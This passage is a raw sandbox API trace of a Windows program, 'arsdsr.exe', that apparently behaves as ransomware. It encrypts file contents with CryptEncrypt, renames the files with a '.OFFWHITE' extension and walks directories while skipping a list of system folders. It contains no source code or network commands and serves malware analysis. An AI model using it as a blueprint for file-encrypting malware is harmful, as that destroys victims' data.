lpString2="KERNEL32.DLL") returned -1 [0147.160] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.160] SystemFunction036 (in: RandomBuffer=0x543a48, RandomBufferLength=0x10 | out: RandomBuffer=0x543a48) returned 1 [0147.161] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.161] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.161] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565338*, pdwDataLen=0x295c290*=0x10, dwBufLen=0x100 | out: pbData=0x565338*, pdwDataLen=0x295c290*=0x100) returned 1 [0147.161] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.161] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.161] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565230*, pdwDataLen=0x295c28c*=0x10, dwBufLen=0x100 | out: pbData=0x565230*, pdwDataLen=0x295c28c*=0x100) returned 1 [0147.161] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x1a60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.161] SetLastError (dwErrCode=0x0) [0147.161] WriteFile (in: hFile=0x20c, lpBuffer=0x565338*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295c4cc, lpOverlapped=0x0 | out: lpBuffer=0x565338*, lpNumberOfBytesWritten=0x295c4cc*=0x100, lpOverlapped=0x0) returned 1 [0147.180] GetLastError () returned 0x0 [0147.180] GetLastError () returned 0x0 [0147.180] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x1b60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.180] WriteFile (in: hFile=0x20c, lpBuffer=0x565230*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295c4cc, lpOverlapped=0x0 | out: lpBuffer=0x565230*, lpNumberOfBytesWritten=0x295c4cc*=0x100, lpOverlapped=0x0) returned 1 [0147.180] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x1c60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.180] WriteFile (in: hFile=0x20c, lpBuffer=0x526b08*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295c4cc, lpOverlapped=0x0 | out: lpBuffer=0x526b08*, lpNumberOfBytesWritten=0x295c4cc*=0x8, lpOverlapped=0x0) returned 1 [0147.180] GetProcessHeap () returned 0x500000 [0147.180] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1a60) returned 0x5687d8 [0147.180] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.180] ReadFile (in: hFile=0x20c, lpBuffer=0x5687d8, nNumberOfBytesToRead=0x1a60, lpNumberOfBytesRead=0x295c4c0, lpOverlapped=0x0 | out: lpBuffer=0x5687d8*, lpNumberOfBytesRead=0x295c4c0*=0x1a60, lpOverlapped=0x0) returned 1 [0147.182] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.182] WriteFile (in: hFile=0x20c, lpBuffer=0x5687d8*, nNumberOfBytesToWrite=0x1a60, lpNumberOfBytesWritten=0x295c4cc, lpOverlapped=0x0 | out: lpBuffer=0x5687d8*, lpNumberOfBytesWritten=0x295c4cc*=0x1a60, lpOverlapped=0x0) returned 1 [0147.182] GetProcessHeap () returned 0x500000 [0147.182] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5687d8 | out: hHeap=0x500000) returned 1 [0147.182] CloseHandle (hObject=0x20c) returned 1 [0147.182] GetProcessHeap () returned 0x500000 [0147.182] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565338 | out: hHeap=0x500000) returned 1 [0147.182] GetProcessHeap () returned 0x500000 [0147.182] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565230 | out: hHeap=0x500000) returned 1 [0147.182] GetProcessHeap () returned 0x500000 [0147.182] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543a60 | out: hHeap=0x500000) returned 1 [0147.182] GetProcessHeap () returned 0x500000 [0147.182] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543a48 | out: hHeap=0x500000) returned 1 [0147.182] lstrcpyW (in: lpString1=0x295c2b8, lpString2="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}" [0147.182] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}.OFFWHITE" [0147.182] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\results\\resource\\{1d1dbf3a-752f-47e2-be70-d848d4a9afb0}"), lpNewFileName="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\results\\resource\\{1d1dbf3a-752f-47e2-be70-d848d4a9afb0}.offwhite")) returned 1 [0147.183] FindNextFileW (in: hFindFile=0x5447d0, lpFindFileData=0x295c518 | out: lpFindFileData=0x295c518*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80be8ad0, ftCreationTime.dwHighDateTime=0x1d33740, ftLastAccessTime.dwLowDateTime=0x80be8ad0, ftLastAccessTime.dwHighDateTime=0x1d33740, ftLastWriteTime.dwLowDateTime=0x81085570, ftLastWriteTime.dwHighDateTime=0x1d33740, nFileSizeHigh=0x0, nFileSizeLow=0x1a60, dwReserved0=0x90008e, dwReserved1=0x295cff0, cFileName="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}", cAlternateFileName="{1D1DB~1")) returned 0 [0147.183] FindClose (in: hFindFile=0x5447d0 | out: hFindFile=0x5447d0) returned 1 [0147.184] FindNextFileW (in: hFindFile=0x544790, lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa13d69d0, ftCreationTime.dwHighDateTime=0x1d2dda3, ftLastAccessTime.dwLowDateTime=0x80be8ad0, ftLastAccessTime.dwHighDateTime=0x1d33740, ftLastWriteTime.dwLowDateTime=0x80be8ad0, ftLastWriteTime.dwHighDateTime=0x1d33740, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x80007e, dwReserved1=0x295d670, cFileName="Resource", cAlternateFileName="")) returned 0 [0147.184] FindClose (in: hFindFile=0x544790 | out: hFindFile=0x544790) returned 1 [0147.184] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x769ce0c6, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0xb9820270, ftLastAccessTime.dwHighDateTime=0x1d2faf0, ftLastWriteTime.dwLowDateTime=0xb9820270, ftLastWriteTime.dwHighDateTime=0x1d2faf0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x70006e, dwReserved1=0x295dcf0, cFileName="Service", cAlternateFileName="")) returned 1 [0147.184] lstrcmpiW (lpString1="Service", lpString2=".") returned 1 [0147.184] lstrcmpiW (lpString1="Service", lpString2="..") returned 1 [0147.184] lstrcmpiW (lpString1="Service", lpString2="...") returned 1 [0147.184] lstrcmpiW (lpString1="Service", lpString2="windows") returned -1 [0147.184] lstrcmpiW (lpString1="Service", lpString2="$recycle.bin") returned 1 [0147.184] lstrcmpiW (lpString1="Service", lpString2="rsa") returned 1 [0147.184] lstrcmpiW (lpString1="Service", lpString2="ntuser.dat") returned 1 [0147.184] lstrcmpiW (lpString1="Service", lpString2="programdata") returned 1 [0147.184] lstrcmpiW (lpString1="Service", lpString2="appdata") returned 1 [0147.184] lstrcmpiW (lpString1="Service", lpString2="program files") returned 1 [0147.184] lstrcmpiW (lpString1="Service", lpString2="program files (x86)") returned 1 [0147.184] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\" [0147.184] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\", lpString2="Service" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service" [0147.184] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\" [0147.184] lstrcpyW (in: lpString1=0x295cff0, lpString2="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\" [0147.184] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\*.*") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\*.*" [0147.184] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\*.*", lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x769ce0c6, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0xb9820270, ftLastAccessTime.dwHighDateTime=0x1d2faf0, ftLastWriteTime.dwLowDateTime=0xb9820270, ftLastWriteTime.dwHighDateTime=0x1d2faf0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x80007e, dwReserved1=0x295d670, cFileName=".", cAlternateFileName="")) returned 0x544790 [0147.185] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0147.185] FindNextFileW (in: hFindFile=0x544790, lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x769ce0c6, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0xb9820270, ftLastAccessTime.dwHighDateTime=0x1d2faf0, ftLastWriteTime.dwLowDateTime=0xb9820270, ftLastWriteTime.dwHighDateTime=0x1d2faf0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x80007e, dwReserved1=0x295d670, cFileName="..", cAlternateFileName="")) returned 1 [0147.185] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0147.185] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0147.185] FindNextFileW (in: hFindFile=0x544790, lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb9820270, ftCreationTime.dwHighDateTime=0x1d2faf0, ftLastAccessTime.dwLowDateTime=0xb9820270, ftLastAccessTime.dwHighDateTime=0x1d2faf0, ftLastWriteTime.dwLowDateTime=0x7de6c9b0, ftLastWriteTime.dwHighDateTime=0x1d3373d, nFileSizeHigh=0x0, nFileSizeLow=0x2, dwReserved0=0x80007e, dwReserved1=0x295d670, cFileName="History.Log", cAlternateFileName="")) returned 1 [0147.186] lstrcmpiW (lpString1="History.Log", lpString2=".") returned 1 [0147.186] lstrcmpiW (lpString1="History.Log", lpString2="..") returned 1 [0147.186] lstrcmpiW (lpString1="History.Log", lpString2="...") returned 1 [0147.186] lstrcmpiW (lpString1="History.Log", lpString2="windows") returned -1 [0147.186] lstrcmpiW (lpString1="History.Log", lpString2="$recycle.bin") returned 1 [0147.186] lstrcmpiW (lpString1="History.Log", lpString2="rsa") returned -1 [0147.186] lstrcmpiW (lpString1="History.Log", lpString2="ntuser.dat") returned -1 [0147.186] lstrcmpiW (lpString1="History.Log", lpString2="programdata") returned -1 [0147.186] lstrcmpiW (lpString1="History.Log", lpString2="appdata") returned 1 [0147.186] lstrcmpiW (lpString1="History.Log", lpString2="program files") returned -1 [0147.186] lstrcmpiW (lpString1="History.Log", lpString2="program files (x86)") returned -1 [0147.186] lstrcpyW (in: lpString1=0x295cde8, lpString2="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\" [0147.186] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\", lpString2="History.Log" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\History.Log") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\History.Log" [0147.186] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.186] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.186] PathFindExtensionW (pszPath="History.Log") returned=".Log" [0147.186] lstrcmpiW (lpString1=".Log", lpString2=".exe") returned 1 [0147.186] lstrcmpiW (lpString1=".Log", lpString2=".log") returned 0 [0147.186] FindNextFileW (in: hFindFile=0x544790, lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xadeed740, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0xadeed740, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x2d1f02a0, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x1a86, dwReserved0=0x80007e, dwReserved1=0x295d670, cFileName="Unknown.Log", cAlternateFileName="")) returned 1 [0147.186] lstrcmpiW (lpString1="Unknown.Log", lpString2=".") returned 1 [0147.186] lstrcmpiW (lpString1="Unknown.Log", lpString2="..") returned 1 [0147.186] lstrcmpiW (lpString1="Unknown.Log", lpString2="...") returned 1 [0147.186] lstrcmpiW (lpString1="Unknown.Log", lpString2="windows") returned -1 [0147.186] lstrcmpiW (lpString1="Unknown.Log", lpString2="$recycle.bin") returned 1 [0147.186] lstrcmpiW (lpString1="Unknown.Log", lpString2="rsa") returned 1 [0147.186] lstrcmpiW (lpString1="Unknown.Log", lpString2="ntuser.dat") returned 1 [0147.187] lstrcmpiW (lpString1="Unknown.Log", lpString2="programdata") returned 1 [0147.187] lstrcmpiW (lpString1="Unknown.Log", lpString2="appdata") returned 1 [0147.187] lstrcmpiW (lpString1="Unknown.Log", lpString2="program files") returned 1 [0147.187] lstrcmpiW (lpString1="Unknown.Log", lpString2="program files (x86)") returned 1 [0147.187] lstrcpyW (in: lpString1=0x295cde8, lpString2="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\" [0147.187] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\", lpString2="Unknown.Log" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\Unknown.Log") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\Unknown.Log" [0147.187] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.187] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.187] PathFindExtensionW (pszPath="Unknown.Log") returned=".Log" [0147.187] lstrcmpiW (lpString1=".Log", lpString2=".exe") returned 1 [0147.187] lstrcmpiW (lpString1=".Log", lpString2=".log") returned 0 [0147.187] FindNextFileW (in: hFindFile=0x544790, lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xadeed740, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0xadeed740, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x2d1f02a0, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x1a86, dwReserved0=0x80007e, dwReserved1=0x295d670, cFileName="Unknown.Log", cAlternateFileName="")) returned 0 [0147.187] FindClose (in: hFindFile=0x544790 | out: hFindFile=0x544790) returned 1 [0147.187] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x244fb42, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x244fb42, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x244fb42, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x70006e, dwReserved1=0x295dcf0, cFileName="Store", cAlternateFileName="")) returned 1 [0147.187] lstrcmpiW (lpString1="Store", lpString2=".") returned 1 [0147.187] lstrcmpiW (lpString1="Store", lpString2="..") returned 1 [0147.187] lstrcmpiW (lpString1="Store", lpString2="...") returned 1 [0147.187] lstrcmpiW (lpString1="Store", lpString2="windows") returned -1 [0147.187] lstrcmpiW (lpString1="Store", lpString2="$recycle.bin") returned 1 [0147.187] lstrcmpiW (lpString1="Store", lpString2="rsa") returned 1 [0147.187] lstrcmpiW (lpString1="Store", lpString2="ntuser.dat") returned 1 [0147.187] lstrcmpiW (lpString1="Store", lpString2="programdata") returned 1 [0147.187] lstrcmpiW (lpString1="Store", lpString2="appdata") returned 1 [0147.187] lstrcmpiW (lpString1="Store", lpString2="program files") returned 1 [0147.187] lstrcmpiW (lpString1="Store", lpString2="program files (x86)") returned 1 [0147.188] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\" [0147.188] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\", lpString2="Store" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Store") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Store" [0147.188] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Store", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Store\\") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Store\\" [0147.188] lstrcpyW (in: lpString1=0x295cff0, lpString2="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Store\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Store\\") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Store\\" [0147.188] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Store\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Store\\*.*") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Store\\*.*" [0147.188] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Store\\*.*", lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x244fb42, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x244fb42, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x244fb42, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x80007e, dwReserved1=0x295d670, cFileName=".", cAlternateFileName="")) returned 0x544790 [0147.188] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0147.188] FindNextFileW (in: hFindFile=0x544790, lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x244fb42, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x244fb42, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x244fb42, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x80007e, dwReserved1=0x295d670, cFileName="..", cAlternateFileName="")) returned 1 [0147.188] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0147.188] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0147.188] FindNextFileW (in: hFindFile=0x544790, lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x244fb42, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x244fb42, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x244fb42, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x80007e, dwReserved1=0x295d670, cFileName="..", cAlternateFileName="")) returned 0 [0147.188] FindClose (in: hFindFile=0x544790 | out: hFindFile=0x544790) returned 1 [0147.188] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x244fb42, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x244fb42, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x244fb42, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x70006e, dwReserved1=0x295dcf0, cFileName="Store", cAlternateFileName="")) returned 0 [0147.188] FindClose (in: hFindFile=0x544750 | out: hFindFile=0x544750) returned 1 [0147.189] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7690f9e4, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x244fb42, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x244fb42, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x640062, dwReserved1=0x295e370, cFileName="History", cAlternateFileName="")) returned 0 [0147.189] FindClose (in: hFindFile=0x544590 | out: hFindFile=0x544590) returned 1 [0147.189] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x76792c22, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x76792c22, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="Support", cAlternateFileName="")) returned 1 [0147.189] lstrcmpiW (lpString1="Support", lpString2=".") returned 1 [0147.189] lstrcmpiW (lpString1="Support", lpString2="..") returned 1 [0147.189] lstrcmpiW (lpString1="Support", lpString2="...") returned 1 [0147.189] lstrcmpiW (lpString1="Support", lpString2="windows") returned -1 [0147.189] lstrcmpiW (lpString1="Support", lpString2="$recycle.bin") returned 1 [0147.189] lstrcmpiW (lpString1="Support", lpString2="rsa") returned 1 [0147.189] lstrcmpiW (lpString1="Support", lpString2="ntuser.dat") returned 1 [0147.189] lstrcmpiW (lpString1="Support", lpString2="programdata") returned 1 [0147.189] lstrcmpiW (lpString1="Support", lpString2="appdata") returned 1 [0147.189] lstrcmpiW (lpString1="Support", lpString2="program files") returned 1 [0147.189] lstrcmpiW (lpString1="Support", lpString2="program files (x86)") returned 1 [0147.189] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\All Users\\Microsoft\\Windows Defender\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\" [0147.189] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\", lpString2="Support" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Support") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Support" [0147.189] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Support", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Support\\") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Support\\" [0147.189] lstrcpyW (in: lpString1=0x295dcf0, lpString2="C:/Users\\All Users\\Microsoft\\Windows Defender\\Support\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Support\\") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Support\\" [0147.189] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Support\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Support\\*.*") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Support\\*.*" [0147.189] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\Windows Defender\\Support\\*.*", lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x76792c22, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x76792c22, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x640062, dwReserved1=0x295e370, cFileName=".", cAlternateFileName="")) returned 0x544590 [0147.190] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0147.190] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x76792c22, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x76792c22, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x640062, dwReserved1=0x295e370, cFileName="..", cAlternateFileName="")) returned 1 [0147.190] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0147.190] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0147.190] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x76792c22, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x76792c22, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x798d48a0, ftLastWriteTime.dwHighDateTime=0x1d4d596, 